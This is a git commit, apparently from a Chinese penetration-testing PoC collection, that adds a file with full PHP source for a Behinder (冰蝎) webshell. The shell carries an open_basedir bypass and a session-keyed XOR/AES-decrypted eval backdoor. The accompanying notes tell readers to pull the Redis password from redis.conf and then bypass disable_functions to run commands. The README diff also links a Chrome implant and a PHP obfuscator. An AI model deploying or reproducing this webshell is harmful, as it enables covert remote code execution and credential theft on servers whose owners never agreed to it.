mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2025-11-06 03:03:57 +00:00
add 冰蝎bypass_open_basedir_shell
This commit is contained in:
parent
38d805d9fa
commit
fff1ccf89c
@ -332,6 +332,7 @@
|
||||
- [CursedChrome:Chrome扩展植入程序,可将受害Chrome浏览器转变为功能齐全的HTTP代理,使你能够以受害人身份浏览网站](https://github.com/mandatoryprogrammer/CursedChrome)
|
||||
- [pivotnacci:通过HTTP隧道进行Socks连接](https://github.com/blackarrowsec/pivotnacci)
|
||||
- [PHPFuck-一款适用于php7以上版本的代码混淆](https://github.com/splitline/PHPFuck)|[[PHPFuck在线版本](https://splitline.github.io/PHPFuck/)
|
||||
- [冰蝎 bypass open_basedir 的马](./tools/冰蝎bypass_open_basedir_shell.md)
|
||||
|
||||
## <span id="head8"> 文章/书籍/教程相关</span>
|
||||
|
||||
|
||||
76
tools/冰蝎bypass_open_basedir_shell.md
Normal file
76
tools/冰蝎bypass_open_basedir_shell.md
Normal file
@ -0,0 +1,76 @@
|
||||
## 冰蝎 bypass open_basedir 的马
|
||||
|
||||
### 作者:https://www.t00ls.net/space.php?uid=7785
|
||||
|
||||
## 内容
|
||||
|
||||
今天看了下:https://www.t00ls.net/thread-56298-1-1.html
|
||||
突然想到为什么不在把 bypass open_basedir 加到马里呢。。。
|
||||
然后。就把冰蝎的马加了一个bypass。。。马还是原马。
|
||||
测试了一下是ok的。。。
|
||||
|
||||
要是服务器上有redis 直接 /www/server/redis/redis.conf 搜索 requirepass 找密码
|
||||
|
||||
然后 用 https://www.t00ls.net/thread-56217-1-1.html bypass disable_functions 执行命令。
|
||||
|
||||
然后一条龙。。。嘿嘿嘿。
|
||||
|
||||
```php
|
||||
<?php
|
||||
@error_reporting(0);
|
||||
session_start();
|
||||
|
||||
function bypass_open_basedir(){
|
||||
if(!file_exists('bypass_open_basedir')){
|
||||
mkdir('bypass_open_basedir');
|
||||
}
|
||||
chdir('bypass_open_basedir');
|
||||
@ini_set('open_basedir','..');
|
||||
@$_Ei34Ww_sQDfq_FILENAME = dirname($_SERVER['SCRIPT_FILENAME']);
|
||||
@$_Ei34Ww_sQDfq_path = str_replace("\\",'/',$_Ei34Ww_sQDfq_FILENAME);
|
||||
@$_Ei34Ww_sQDfq_num = substr_count($_Ei34Ww_sQDfq_path,'/') + 1;
|
||||
$_Ei34Ww_sQDfq_i = 0;
|
||||
while($_Ei34Ww_sQDfq_i < $_Ei34Ww_sQDfq_num){
|
||||
@chdir('..');
|
||||
$_Ei34Ww_sQDfq_i++;
|
||||
}
|
||||
@ini_set('open_basedir','/');
|
||||
@rmdir($_Ei34Ww_sQDfq_FILENAME.'/'.'bypass_open_basedir');
|
||||
}
|
||||
bypass_open_basedir();
|
||||
|
||||
if (isset($_GET['pass']))
|
||||
{
|
||||
$key=substr(md5(uniqid(rand())),16);
|
||||
$_SESSION['k']=$key;
|
||||
print $key;
|
||||
}
|
||||
else
|
||||
{
|
||||
$key=$_SESSION['k'];
|
||||
$post=file_get_contents("php://input").'';
|
||||
if(!extension_loaded('openssl'))
|
||||
{
|
||||
$t="base64_"."decode";
|
||||
$post=$t($post."");
|
||||
|
||||
for($i=0;$i<strlen($post);$i++) {
|
||||
$post[$i] = $post[$i]^$key[$i+1&15];
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
$post=openssl_decrypt($post, "AES128", $key);
|
||||
}
|
||||
$arr=explode('|',$post);
|
||||
$func=$arr[0];
|
||||
$params=$arr[1];
|
||||
@eval($params);
|
||||
}
|
||||
?>
|
||||
|
||||
```
|
||||
|
||||
### 原帖:https://www.t00ls.net/thread-56301-1-1.html
|
||||
|
||||
### 欢迎大家前往土司投稿!
|
||||
Loading…
x
Reference in New Issue
Block a user